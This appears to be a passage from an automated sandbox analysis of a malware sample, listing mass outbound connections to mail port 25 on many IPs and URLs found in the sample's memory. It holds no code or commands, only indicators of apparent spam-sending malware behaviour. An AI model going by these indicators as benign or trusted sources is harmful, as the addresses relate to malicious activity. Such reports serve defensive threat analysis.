              Source: global trafficTCP traffic: 192.168.2.3:50128 -> 219.94.128.87:25
              Source: global trafficTCP traffic: 192.168.2.3:50130 -> 54.39.198.18:25
              Source: global trafficTCP traffic: 192.168.2.3:50136 -> 75.2.70.75:25
              Source: global trafficTCP traffic: 192.168.2.3:50139 -> 104.21.234.121:25
              Source: global trafficTCP traffic: 192.168.2.3:50142 -> 154.201.225.123:25
              Source: global trafficTCP traffic: 192.168.2.3:50143 -> 35.231.13.148:25
              Source: global trafficTCP traffic: 192.168.2.3:50144 -> 94.100.180.31:25
              Source: global trafficTCP traffic: 192.168.2.3:50145 -> 13.113.204.223:25
              Source: global trafficTCP traffic: 192.168.2.3:50148 -> 153.122.170.15:25
              Source: global trafficTCP traffic: 192.168.2.3:50159 -> 66.218.88.159:25
              Source: global trafficTCP traffic: 192.168.2.3:50163 -> 217.69.139.150:25
              Source: global trafficTCP traffic: 192.168.2.3:50167 -> 13.248.169.48:25
              Source: global trafficTCP traffic: 192.168.2.3:50178 -> 65.52.128.33:25
              Source: global trafficTCP traffic: 192.168.2.3:50181 -> 142.250.153.27:25
              Source: global trafficTCP traffic: 192.168.2.3:50189 -> 142.250.153.26:25
              Source: global trafficTCP traffic: 192.168.2.3:50213 -> 103.168.172.217:25
              Source: global trafficTCP traffic: 192.168.2.3:50223 -> 104.21.68.7:25
              Source: global trafficTCP traffic: 192.168.2.3:50229 -> 103.168.172.221:25
              Source: global trafficTCP traffic: 192.168.2.3:50280 -> 211.13.196.162:25
              Source: global trafficTCP traffic: 192.168.2.3:50284 -> 198.1.81.28:25
              Source: global trafficTCP traffic: 192.168.2.3:50286 -> 153.120.34.73:25
              Source: global trafficTCP traffic: 192.168.2.3:51077 -> 38.36.96.76:25
              Source: global trafficTCP traffic: 192.168.2.3:51712 -> 81.0.97.108:25
              Source: global trafficTCP traffic: 192.168.2.3:52155 -> 54.212.145.129:25
              Source: global trafficTCP traffic: 192.168.2.3:52481 -> 202.172.28.89:25
              Source: global trafficTCP traffic: 192.168.2.3:58148 -> 202.53.77.146:25
              Source: global trafficTCP traffic: 192.168.2.3:62251 -> 35.172.94.1:25
              Source: global trafficTCP traffic: 192.168.2.3:62306 -> 195.96.252.188:25
              Source: global trafficTCP traffic: 192.168.2.3:62346 -> 219.94.129.97:25
              Source: global trafficTCP traffic: 192.168.2.3:62363 -> 92.204.129.113:25
              Source: global trafficTCP traffic: 192.168.2.3:62364 -> 104.21.76.140:25
              Source: global trafficTCP traffic: 192.168.2.3:62374 -> 198.185.159.144:25
              Source: global trafficTCP traffic: 192.168.2.3:62381 -> 23.239.201.14:25
              Source: global trafficTCP traffic: 192.168.2.3:62637 -> 23.227.38.32:25
              Source: global trafficTCP traffic: 192.168.2.3:62758 -> 49.212.235.59:25
              Source: global trafficTCP traffic: 192.168.2.3:62873 -> 34.205.242.146:25
              Source: global trafficTCP traffic: 192.168.2.3:62906 -> 62.122.170.171:25
              Source: global trafficTCP traffic: 192.168.2.3:63491 -> 162.241.233.114:25
              Source: global trafficTCP traffic: 192.168.2.3:63741 -> 83.167.255.150:25
              Source: global trafficTCP traffic: 192.168.2.3:63794 -> 104.26.13.244:25
              Source: global trafficTCP traffic: 192.168.2.3:63926 -> 47.91.170.222:25
              Source: global trafficTCP traffic: 192.168.2.3:64939 -> 104.21.8.75:25
              Source: global trafficTCP traffic: 192.168.2.3:64946 -> 104.21.24.39:25
              Source: global trafficTCP traffic: 192.168.2.3:1600 -> 5.134.4.115:25
              Source: global trafficTCP traffic: 192.168.2.3:1745 -> 72.251.233.245:25
              Source: global trafficTCP traffic: 192.168.2.3:1902 -> 93.187.206.66:25
              Source: global trafficTCP traffic: 192.168.2.3:2116 -> 13.56.33.8:25
              Source: global trafficTCP traffic: 192.168.2.3:2198 -> 45.142.176.225:25
              Source: global trafficTCP traffic: 192.168.2.3:2332 -> 203.0.113.0:25
              Source: global trafficTCP traffic: 192.168.2.3:2371 -> 46.30.60.158:25
              Source: global trafficTCP traffic: 192.168.2.3:2372 -> 104.21.55.151:25
              Source: global trafficTCP traffic: 192.168.2.3:2465 -> 34.224.10.110:25
              Source: global trafficTCP traffic: 192.168.2.3:2582 -> 81.169.145.175:25
              Source: global trafficTCP traffic: 192.168.2.3:2757 -> 3.130.253.23:25
              Source: global trafficTCP traffic: 192.168.2.3:3206 -> 157.7.107.49:25
              Source: global trafficTCP traffic: 192.168.2.3:3993 -> 217.74.161.133:25
              Source: global trafficTCP traffic: 192.168.2.3:4334 -> 62.75.251.116:25
              Source: global trafficTCP traffic: 192.168.2.3:4579 -> 164.90.244.158:25
              Source: global trafficTCP traffic: 192.168.2.3:5440 -> 203.137.75.45:25
              Source: global trafficTCP traffic: 192.168.2.3:15199 -> 185.230.63.107:25
              Source: global trafficTCP traffic: 192.168.2.3:15332 -> 49.12.155.123:25
              Source: global trafficTCP traffic: 192.168.2.3:15355 -> 46.8.8.200:25
              Source: global trafficTCP traffic: 192.168.2.3:15372 -> 59.106.13.169:25
              Source: global trafficTCP traffic: 192.168.2.3:17481 -> 141.193.213.20:25
              Source: global trafficTCP traffic: 192.168.2.3:18728 -> 91.201.52.102:25
              Source: global trafficTCP traffic: 192.168.2.3:19907 -> 89.31.143.1:25
              Source: global trafficTCP traffic: 192.168.2.3:21200 -> 86.105.245.69:25
              Source: global trafficTCP traffic: 192.168.2.3:24032 -> 199.34.228.78:25
              Source: global trafficTCP traffic: 192.168.2.3:24301 -> 204.15.134.44:25
              Source: global trafficTCP traffic: 192.168.2.3:24629 -> 3.64.163.50:25
              Source: global trafficTCP traffic: 192.168.2.3:26859 -> 173.205.126.33:25
              Source: global trafficTCP traffic: 192.168.2.3:28845 -> 93.189.66.202:25
              Source: global trafficTCP traffic: 192.168.2.3:28851 -> 103.4.16.43:25
              Source: global trafficTCP traffic: 192.168.2.3:29356 -> 27.0.174.59:25
              Source: global trafficTCP traffic: 192.168.2.3:30237 -> 212.44.102.75:25
              Source: global trafficTCP traffic: 192.168.2.3:41069 -> 18.119.154.66:25
              Source: global trafficTCP traffic: 192.168.2.3:42594 -> 35.230.155.43:25
              Source: global trafficTCP traffic: 192.168.2.3:42857 -> 204.11.56.50:25
              Source: global trafficTCP traffic: 192.168.2.3:42872 -> 205.178.189.131:25
              Source: global trafficTCP traffic: 192.168.2.3:42894 -> 216.177.137.32:25
              Source: global trafficTCP traffic: 192.168.2.3:42955 -> 15.197.142.173:25
              Source: global trafficTCP traffic: 192.168.2.3:43022 -> 185.22.232.175:25
              Source: global trafficTCP traffic: 192.168.2.3:43029 -> 194.143.194.23:25
              Source: global trafficTCP traffic: 192.168.2.3:43040 -> 193.70.68.254:25
              Source: global trafficTCP traffic: 192.168.2.3:43117 -> 165.160.15.20:25
              Source: global trafficTCP traffic: 192.168.2.3:44028 -> 93.188.2.51:25
              Source: global trafficTCP traffic: 192.168.2.3:50224 -> 185.129.138.60:25
              Source: global trafficTCP traffic: 192.168.2.3:50241 -> 195.128.140.29:25
              Source: global trafficTCP traffic: 192.168.2.3:50267 -> 52.71.57.184:25
              Source: global trafficTCP traffic: 192.168.2.3:50319 -> 5.39.75.157:25
              Source: global trafficTCP traffic: 192.168.2.3:50326 -> 156.251.140.23:25
              Source: global trafficTCP traffic: 192.168.2.3:50644 -> 59.106.13.181:25
              Source: global trafficTCP traffic: 192.168.2.3:50652 -> 3.94.41.167:25
              Source: global trafficTCP traffic: 192.168.2.3:62895 -> 89.107.169.125:25
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.gravatar.com/avatar/8f1795d9778dd5337c87d22e0464e1c3?s=96&d=mm&r=g
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.484231068.0000000006C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijaco/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijakujaco
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cer-slo.si/predstavitev.html
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=L
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://erp-companion.com-sit.com/de/user/login
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://furec.sakura.ne.jp/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gholographic.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/164.html
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 